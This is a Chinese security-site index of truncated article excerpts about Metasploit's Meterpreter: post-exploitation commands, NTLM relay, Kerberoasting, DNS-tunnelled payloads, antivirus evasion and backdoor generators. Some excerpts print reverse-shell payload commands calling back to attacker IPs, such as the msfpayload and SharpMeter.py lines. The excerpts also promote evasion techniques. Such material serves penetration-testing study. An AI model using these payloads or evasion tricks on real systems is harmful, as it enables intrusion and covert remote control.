记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

meterpreter必知必会的15个命令

meterpreter是一种高级、隐蔽、多层面的且可动态扩展的payload,可以将反射dll注入到目标主机的内存中,还可以在运行时动态加载脚本和插件来进行后渗透利用。包括提权、转存系统账号、键盘记录、持久后门服务、启用远程桌面等,还有很多其他的扩展。而且,meterpreter shell的整个通信都是默认加密的。因为meterpreter提供的是一个全新的环境,所以我们本文来讲解一些必备的meterpreter命令,带你入门并且逐渐熟悉这款强大的工具。命令1:上传文件到Windows主机简单来说,你可以上传本机的任意文件到远程目标主机中。命令:upload <file> <de
发布时间:2018-10-25 12:20 | 阅读:94060 | 评论:0 | 标签:安全工具 Metasploit Meterpreter

在meterpreter中进行NTLM中继攻击

劫持端口445以执行中继攻击或哈希捕获攻击一直是一个反复出现的话题。当你使用meterpreter感染目标时,如何在端口445上侦听?几个星期前,这个话题再次浮出水面,而这是一个已经解决的问题,并且拥有随时可用的工具,但很多人都不知道该解决方案。接下来我们将解释如何利用这些工具来对你具有meterpreter会话的目标执行中继攻击。这种方法的另一个好处是,你不需要python2exe或感染主机上的整个python堆栈,只需一个简单的驱动程序和一个meterpreter感染就可以了。本文的第一部分将重点介绍能够劫持445端口的思维过程,第二部分将重点关注使其可用于中继攻击。如果你想跳过思考过程和中继设置,你还可以直接跳到
发布时间:2018-09-17 12:20 | 阅读:82969 | 评论:0 | 标签:技术 Meterpreter

为Kerberoast干杯

本文探讨通过现成的Meterpreter session对基于互联网的Ubuntu 16.04 C2服务器执行远程Kerberoast攻击、使用Hashcat脱机破解凭证的技巧。 最近我在现用目录域环境下使用Kerberoasting攻击进行特权提升方面取得了不少成功。Tim Medin曾在2014年SANS Hackfest上展示了该技巧。从那之后,许多文章和会议中都对其攻击细节及不同技巧的工具编写进行完善(参考链接见文末)。 Kerberos在微软上配置比较复杂,但攻击主旨在于其利用了Windows老用户旧有的动态目录、加密类型和关键材料进行加密和签发Kerberros票据。根本来说,当域账户配置为在如MS SQL环境下运行服务时,域内的服务主体名称(SPN)的服务会与登录账户关联起来。当用户向使用特定资
发布时间:2017-06-08 21:25 | 阅读:95496 | 评论:0 | 标签:工具 Hashcat Kerberoast Meterpreter

Meterpreter详解与渗透实战

Payload Payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等。 Payload有几种类型: singles:独立载荷,可直接植入目标系统并执行相应的程序,如:shell_bind_tcp这个payload。 stagers:传输器载荷,用于目标机与攻击机之间建立稳定的网络连接,与传输体载荷配合攻击。通常该种载荷体积都非常小,可以在漏洞利用后方便注入,这类载荷功能都非常相似,大致分为bind型 reverse型,bind型是需要攻击机主动连接目标端口的;而reverse型是目标机会反连接攻击机,需要提前设定好连接攻击机的ip地址和端口号。 stages:传输体载荷,如shell,meterpreter等。在stagers建立好稳定的连接后,攻击机将s
发布时间:2017-06-08 21:25 | 阅读:179247 | 评论:0 | 标签:技术控 Meterpreter Payload 渗透实战

通过 DNS AAAA 记录和 IPv6 地址传输 Backdoor Payloads

通过DNS AAAA记录和IPv6地址传输Backdoor Payloads 在本文中我想解释如何在DNS 流量中使用IPv6地址(AAAA)记录转移Payloads。 我们谈谈AAAA记录。 本文有2部分: 第一部分:DNS AAAA记录和ICMPv6 第二部分:DNS和AAAA记录(大型DNS AAAA记录响应) 第一部分:DNS AAAA记录和ICMPv6 IPv6地址想用于传输Payloads,如何要做到这一点很简单。 例如,我们有一个IPv6地址是这样的: fe80:1111:0034:abcd:ef00:ab11:ccf1:0000 在这种情况下,我们可以使用IPv6地址的这些“xxxx”部分用于我们的Payloads。 fe80:1111:xxxx:xxxx:xxxx:xxxx:xxxx
发布时间:2017-02-26 01:55 | 阅读:155720 | 评论:0 | 标签:Web安全 DNS ipV6 Meterpreter Payloads

SharpMeter:Meterpreter反弹shell生成工具(绕过白名单限制)

项目主页 https://github.com/vvalien/SharpMeter 简介 SharpMeter是一款用于生成 Meterpreter 反弹 shell 的工具,同时可绕过一些白名单限制 使用 tcp python SharpMeter.py 192.168.1.101 4444 compileme.cs tcp Close Window / XOR IP python SharpMeter.py 192.168.1.101 443 compileme.cs https -w -x AppLocker python SharpMeter.py 192.168.1.101 443 compileme.cs https -w -a -x msbuild! python SharpMeter.py
发布时间:2016-12-02 20:10 | 阅读:164279 | 评论:0 | 标签:工具 Meterpreter SharpMeter 反弹shell 反弹shell生成工具 绕过白名单限制

Meterpreter免杀技巧分享(亲测有效)

0×01 meterpreter简介 MetasploitFramework是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。 需要说明的是meterpreter在漏洞利用成功后会发送第二阶段的代码和meterpreter服务器dll,所以在网络不稳定的情况下经常出现没有可执行命令,或者会话建立执行help之后发现缺少命令,经常出现什么sending stager error,稍等片刻就好。 0×02 生成后门 在旧的metasploit中,生成payload是用msfpayload+msfencode,之后rapid7整合了这两个命令变成了msfveno
发布时间:2016-11-07 01:20 | 阅读:139676 | 评论:0 | 标签:工具 系统安全 Meterpreter

谈一谈SQLite Load_Extension的妙用

什么是load_extension? 这个接口加载一个SQLite扩展库的文件 更多信息:https://www.sqlite.org/c3ref/load_extension.html 你可以用这个函数来加载一个SQLite扩展。但是在默认情况下sqlite3_enable_load_extension()默认是关闭的,以防止这种情况的SQL注入攻击。 你可以从这里了解更多:https://www.sqlite.org/c3ref/enable_load_extension.html 语法: 这个路径const char *zFile可以是一个SMB共享 自定义DLL 我们可以定义自己的恶意DLL文件并执行我们自己的恶意代码。#include &lt;windows.h&gt; /*
发布时间:2016-10-12 06:05 | 阅读:129069 | 评论:0 | 标签:网络安全 DLL GameOver html load_extension Meterpreter shellcode

TheFatRat:Msfvenom免杀后门生成工具

项目主页 https://github.com/screetsec/thefatrat 本工具能使用msfvenom生成后门,程序能够用meterpreter reverse_tcp payload编译C语言程序,并能够绕过杀软。 自动化metasploit功能 检查metasploit服务是否启动 建造Windows, Linux, Android 和Mac的meterpreter reverse_tcp payload 开启多个meterpreter reverse_tcp监听 searchsploit快速搜索 免杀 进入Msfconsole 自动运行后门 目标如果没有开启UAC,你就可以这些文件复制到CD或USB。修改图标或者后缀 安装要求 linux操作系统,推荐Kali Linux 2或Kal
发布时间:2016-09-20 05:30 | 阅读:365408 | 评论:0 | 标签:工具 linux Meterpreter Msfconsole msfvenom Payload TheFatRat

渗透攻防工具篇-后渗透阶段的Meterpreter

前言 熟悉Metasploit的应该对Meterpreter不陌生,作为后渗透阶段的利器,其强大之处可想而知,那么本篇文章就带大家来学习一下Meterpreter,目的在于让大家了解它的常用命令和使用方法。 目录 第一节 初识Meterpreter 1.1、什么是Meterpreter 1.2、Meterpreter的优点 第二节 Meterpreter中常用的Shell 2.1、reverse_tcp 2.2、reverse_http 2.3、reverse_https 2.4、bind_tcp 第三节 Meterpreter的常用命令 3.1、基本命令 3.2、文件系统命令 3.3、网络命令 3.4、系统命令 第四节 后渗透攻击模块 4.1、什么是后渗透攻击模块 4.2、后渗透攻击模块的实现原
发布时间:2016-08-31 11:05 | 阅读:107872 | 评论:0 | 标签:内网渗透 Meterpreter shell 后渗透 攻击模块 渗透攻防

一次完整的从webshell到域控的探索之路

前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里。 于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求。 今天小菜我本着所有师傅们无私分享的精神,特将三年内求师傅,求妹子,求神器所得,经过整理后,关键的知识点写出来。 相关知识点总结如下: 免杀 payload 的生成,请使用 Veil msf 在 meterpreter 下的提权尝试 msf 在 meterpreter 下的 bypassuac 尝试 内网渗透测试过程中的信息关联 meterpreter 的路由添加以及相关扫描 Powershell 在 meterpreter 下面的使用 Meterpreter 的 post 模块使用 Msf 的 custom 自己生成的 payload 的使用 进
发布时间:2016-08-21 00:35 | 阅读:208797 | 评论:0 | 标签:内网渗透 bypassuac cimoom dumphash Empire hashdump Impersonate_t

Easy_P powershell:常用代码生成辅助工具

前言 powershell功能强大,不仅仅体现在系统管理上。在日常的渗透过程中,为了规避防火墙等原因,我们需要一些powershell脚本来辅助我们完成渗透测试工作,对于不熟悉powershell脚本的来说,有一定的难度。还好有人已经想到了这一点,写了个辅助的python脚本,可以自动生成一些常用的powershell。 项目主页 https://github.com/cheetz/Easy-P 简介 Easy_P is a tool used for showing a user which PowerShell scripts to use in a penetration test, depending on the users needs.PowerShell/WMI Generator ======
发布时间:2016-08-16 21:05 | 阅读:145291 | 评论:0 | 标签:工具 Easy_P Meterpreter powershell 代码生成 辅助工具

Metasploit如何派生一个shell给cobaltstrike

Cobaltstrike作为一款协同APT工具,功能十分强大,针对内网的渗透测试和作为apt的控制终端功能,使其变成众多APT组织的首选,fireeye多次分析过实用cobaltstrike进行apt的案例。 cobaltstrike3新版的已经摒弃了metasploit,重写了所有的功能,但是鉴于metasploit功能的强大,cobaltstrike仍然保留了对metasploit的接口,今天我们不聊其他的, 只聊当我们使用metasploit获取到shell之后如何派生一个新的shell给cobaltstrike。系列参考我在安全脉搏上的:Cobalt strike browser pivot的应用实例   实验环境: 目标机器:windows server 2012  IP:192.168.8
发布时间:2016-08-16 11:50 | 阅读:166483 | 评论:0 | 标签:内网渗透 APT组织 beacon_http Cobaltstrike cobaltstrike3 fireeye me

对meterpreter的http或https的handler进行识别和攻击

本文将展示如何对meterpreter的https或http的handler进行识别,以及如何进行拒绝服务攻击(通过在攻击者和和监听器之间设置假的会话)。概要:1、通过HTTP GET请求特定的文件,并检查文件内容包含“core_patch_url”这样的字符串,识别出可能是反向Handlers。通过发出异常的GET请求,让Handler或listener无法处理而崩溃,Listener可以被欺骗有一个正在打开的meterpreter会话,或强制保持为停止接收会话的状态。2、通过请求特殊文件,让handler误以为有meterpreter会话正要连入,然后停止接收要连入的其他会话。下载:反向Handler Dos 脚本:https://gist.github.
发布时间:2016-02-17 22:35 | 阅读:115099 | 评论:0 | 标签:WEB安全 handler识别攻击 httphttps Meterpreter

Metasploit后渗透技巧[2]

初次接触msf最令人兴奋的莫过于跳板功能,通过msf添加路由功能,可以直接使用msf对本来不能访问的内网进行连接(建立访问连接是渗透的第一步),一旦建立连接那么就是想干什么都可以真是强大无比。使用meterpreter的autoroute功能,即可完成该操作。首先使用get_local_subnets脚本获得受控系统本地子网,然后使用autoroute脚本添加路由。这样操作后就会看到添加的路由表,网关是session 3即payload程序。如果我在msf指定某个模块的ip地址是192.168.244.*,则会通过session3 网关进行转发,访问到目标ip.跟建立网络连接的还有一个经常使用的,就是网络映射功能,meterpreter中有一个getgui脚本(我的bt下脚本存放路径/opt/metasploi
发布时间:2014-07-09 19:25 | 阅读:113568 | 评论:0 | 标签:渗透技巧 meterpreter 内网渗透 渗透测试

Meterpreter初探

攻击端: OS:Kali IP:192.168.111.129 被害端: OS:Windows server 2008 (64位) IP:192.168.111.133 首先在Kali上生成meterpreter的payload root@Kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2013 X > file.exe Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 290 Options: {"LHOST"=>"192.1
发布时间:2014-04-10 21:35 | 阅读:213686 | 评论:0 | 标签:渗透技巧 meterpreter 内网渗透 渗透测试

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云